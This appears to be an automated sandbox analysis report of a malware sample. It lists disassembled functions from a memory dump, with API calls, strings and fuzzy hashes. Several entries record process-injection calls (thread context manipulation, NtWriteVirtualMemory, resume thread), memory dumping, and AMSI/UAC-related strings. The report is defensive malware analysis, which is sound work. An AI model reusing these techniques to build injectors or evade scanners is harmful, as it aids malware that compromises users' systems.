Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
Instruction ID: b81785ac39ac348f7d99c46f66c62c6545129381dee0b438db767bf1dfaf5fd6
Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
Instruction Fuzzy Hash: BCC08CA62022000B9A60B1FC0CC444A42CC8B0413E3B40FF5B53CCA2D2DB218812B410

Function 02B84C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02B84C37

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction ID: bf73fa03db257a1aa0158afe27383b0d9b97acc24aab623a56ed7b980423f056
Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction Fuzzy Hash: 93C012B261133547EB216A9C9CC075662DCDB052A5F1400E1D50CD7240E3609C00CB65

Function 02BABB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02BABB44,00000000,00000001), ref: 02BABB60

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
Instruction ID: 715282e57a9da7592a63dde5486cb961699fab0960b2df505f1ce444621d609f
Opcode Fuzzy Hash: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
Instruction Fuzzy Hash: B1C092F17D63003EF62466A81CD2F63668DE704B04FA00492BB05EE2D1D5E248604A74

Function 02B815CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B81A03,?,02B82000), ref: 02B815E2

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
Instruction ID: 57c5026d241bf3d611f125d77d24ea41958ac3ff2b670853cbdfab64455f21bc
Opcode Fuzzy Hash: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
Instruction Fuzzy Hash: FFF0E7F0B523004BEB85DF7999543856BE6E789384F1485B9E609DF298E77194128B10

Function 02B81682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B82000), ref: 02B816A4

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
Instruction ID: e4d9663a327a22b40cec395272e1fac4fe0bad7d1e0b1fd9b1caa6fe5d5e81fb
Opcode Fuzzy Hash: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
Instruction Fuzzy Hash: FFF0B4B2B41795ABDB20AF5E9C81782BBA4FB00354F054579F98CAB340D7B0A811CFD4

Function 02B816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B81FE4), ref: 02B81704

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
Instruction ID: 2bad6eab8ab04fbb28b43f7469c63964cf9dcbdac5cb67d275f366816ee9fc15
Opcode Fuzzy Hash: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
Instruction Fuzzy Hash: 10E086B9311301AFD7106E7D5D407126BD8EB44654F1448B9F54DDB241D2A0E811CB60

Non-executed Functions

Function 02B9A95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B9ABE3,?,?,02B9AC75,00000000,02B9AD51), ref: 02B9A970
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B9A988
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B9A99A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B9A9AC
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B9A9BE
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B9A9D0
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B9A9E2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B9A9F4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B9AA06
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B9AA18
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B9AA2A
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B9AA3C
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B9AA4E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B9AA60
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B9AA72
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B9AA84
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B9AA96

Strings

CreateToolhelp32Snapshot, xrefs: 02B9A980
Process32Next, xrefs: 02B9A9FE
Toolhelp32ReadProcessMemory, xrefs: 02B9A9DA
Heap32ListFirst, xrefs: 02B9A992
Heap32ListNext, xrefs: 02B9A9A4
Heap32Next, xrefs: 02B9A9C8
Process32FirstW, xrefs: 02B9AA10
Module32First, xrefs: 02B9AA58
Heap32First, xrefs: 02B9A9B6
Module32NextW, xrefs: 02B9AA8E
Process32NextW, xrefs: 02B9AA22
Thread32Next, xrefs: 02B9AA46
Thread32First, xrefs: 02B9AA34
Module32FirstW, xrefs: 02B9AA7C
Module32Next, xrefs: 02B9AA6A
kernel32.dll, xrefs: 02B9A96B
Process32First, xrefs: 02B9A9EC

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
Instruction ID: fa2d7c08963535ea822810031a1ae9833ec43e1218a9759bc82fe18609e8881a
Opcode Fuzzy Hash: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
Instruction Fuzzy Hash: 69318FB0A90760EFEF10AFB8D885A6A37EAEB06740B5009F5F40ADF215D7749850CF51

Function 02B98BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
Part of subcall function 02B98824: FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB

GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442

Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74

SetThreadContext.KERNEL32(00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8,00000004,02BE14FC), ref: 02B9A157
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8), ref: 02B9A164

Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A

Strings

NtOpenObjectAuditAlarm, xrefs: 02B9A474, 02B9A52C
SLGetLicenseInformation, xrefs: 02B9919F
ntdll, xrefs: 02B9A465, 02B9A479, 02B9A531, 02B9A6D4, 02B9A6E8
Initialize, xrefs: 02B98F2A, 02B99538, 02B996BF, 02B99AA8, 02B99D0A, 02B99E7A, 02B99FED, 02B9A252, 02B9A583
MiniDumpReadDumpStream, xrefs: 02B9A568
dbgcore, xrefs: 02B9A559, 02B9A56D
UacInitialize, xrefs: 02B98E72, 02B991D3, 02B99352, 02B99456, 02B99852, 02B999C6, 02B9A170
BCryptVerifySignature, xrefs: 02B9A3B3
ScanString, xrefs: 02B98C42, 02B98DED, 02B98F9B, 02B993C3, 02B995A9, 02B99730, 02B99BBD, 02B99D7B, 02B99EEB, 02B9A05E, 02B9A349, 02B9A3F6
UacScan, xrefs: 02B98CB3, 02B98ECB, 02B994C7, 02B998C3, 02B99A37, 02B9A1E1, 02B9A679
sppc, xrefs: 02B991B6
I_QueryTagInformation, xrefs: 02B9A540
BCryptQueryProviderRegistration, xrefs: 02B9A3C7
OpenSession, xrefs: 02B98BE9, 02B9900C, 02B990BE, 02B9A48F, 02B9A5D5
ScanBuffer, xrefs: 02B98D0C, 02B98D94, 02B9912F, 02B99244, 02B992E1, 02B9961A, 02B997A1, 02B99934, 02B99B19, 02B99C2E, 02B99DEC, 02B99F5C, 02B9A0CF, 02B9A2C3, 02B9A4E1, 02B9A627
NtReadVirtualMemory, xrefs: 02B9A460
NtOpenProcess, xrefs: 02B9A6E3
advapi32, xrefs: 02B9A545
MiniDumpWriteDump, xrefs: 02B9A554
NtSetSecurityObject, xrefs: 02B9A6CF
bcrypt, xrefs: 02B9A3B8, 02B9A3CC, 02B9A3E0
BCryptRegisterProvider, xrefs: 02B9A3DB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Library$Thread$ContextFreeLoad$AddressMemoryProcResumeVirtualWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3455621253-51457883
Opcode ID: 45c716c9ed5a1993209342aecabf94c1a15bcaa3ae14377cc3bacf6e18bc45fc
Instruction ID: e56dc092587a7425e98617c74bdd4ca2b52ea06b1914e488ed30daccc74e0ae1
Opcode Fuzzy Hash: 45c716c9ed5a1993209342aecabf94c1a15bcaa3ae14377cc3bacf6e18bc45fc
Instruction Fuzzy Hash: 7AE2E635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51

Function 02B98BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
Part of subcall function 02B98824: FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB

GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442

Strings

NtOpenObjectAuditAlarm, xrefs: 02B9A474, 02B9A52C
SLGetLicenseInformation, xrefs: 02B9919F
ntdll, xrefs: 02B9A465, 02B9A479, 02B9A531, 02B9A6D4, 02B9A6E8
Initialize, xrefs: 02B98F2A, 02B99538, 02B996BF, 02B99AA8, 02B99D0A, 02B99E7A, 02B99FED, 02B9A252, 02B9A583
MiniDumpReadDumpStream, xrefs: 02B9A568
dbgcore, xrefs: 02B9A559, 02B9A56D
UacInitialize, xrefs: 02B98E72, 02B991D3, 02B99352, 02B99456, 02B9A170
BCryptVerifySignature, xrefs: 02B9A3B3
ScanString, xrefs: 02B98C42, 02B98DED, 02B98F9B, 02B993C3, 02B995A9, 02B99730, 02B99BBD, 02B99D7B, 02B99EEB, 02B9A05E, 02B9A349, 02B9A3F6
UacScan, xrefs: 02B98CB3, 02B98ECB, 02B994C7, 02B998C3, 02B99A37, 02B9A1E1, 02B9A679
sppc, xrefs: 02B991B6
I_QueryTagInformation, xrefs: 02B9A540
BCryptQueryProviderRegistration, xrefs: 02B9A3C7
OpenSession, xrefs: 02B98BE9, 02B9900C, 02B990BE, 02B9A48F, 02B9A5D5
ScanBuffer, xrefs: 02B98D0C, 02B98D94, 02B9912F, 02B99244, 02B992E1, 02B9961A, 02B997A1, 02B99934, 02B99B19, 02B99C2E, 02B99DEC, 02B99F5C, 02B9A0CF, 02B9A2C3, 02B9A4E1, 02B9A627
NtReadVirtualMemory, xrefs: 02B9A460
NtOpenProcess, xrefs: 02B9A6E3
advapi32, xrefs: 02B9A545
MiniDumpWriteDump, xrefs: 02B9A554
NtSetSecurityObject, xrefs: 02B9A6CF
bcrypt, xrefs: 02B9A3B8, 02B9A3CC, 02B9A3E0
BCryptRegisterProvider, xrefs: 02B9A3DB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Library$ContextFreeLoadThread
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 720575881-51457883
Opcode ID: 4911698fa3d0bc7dd570b2f864237e3e6d22ad4f4448e2cf1b0bbf88f7cd3e5e
Instruction ID: a0c72d54ce5fbdb53d6ce4596711ce11cad0a18ee8b1695d1722386a183ce621
Opcode Fuzzy Hash: 4911698fa3d0bc7dd570b2f864237e3e6d22ad4f4448e2cf1b0bbf88f7cd3e5e
Instruction Fuzzy Hash: 22E2D635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51

Function 02B858B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B858D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B858E8
lstrcpynA.KERNEL32(?,?,?), ref: 02B85918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B8597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000), ref: 02B85A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338), ref: 02B85A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B85A45

Strings

\, xrefs: 02B859F5
kernel32.dll, xrefs: 02B858CC
GetLongPathNameA, xrefs: 02B858DF

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
Instruction ID: 78037737497b0d3f00325eaeac12c48656ba8a9215c633ecf892bccdd2660811
Opcode Fuzzy Hash: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
Instruction Fuzzy Hash: FA415C71D00259AFDB20EAE8CCC8AEEB3ADEB08310F4545E5A15CE7241E770AA45CF54

Function 02B85B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97

Strings

Software\Borland\Locales, xrefs: 02B85AA8, 02B85AC6
Software\Borland\Delphi\Locales, xrefs: 02B85AE4

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 2cdaac62cca5567b1c7c5ac2aff5a96723207d703ffdc93bfd39531b8683dc98
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 21318471E4021C2AEB35EEB89C85FEF77AD9B04380F4501E1964CE6181DB749E84CF91

Function 02B987A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
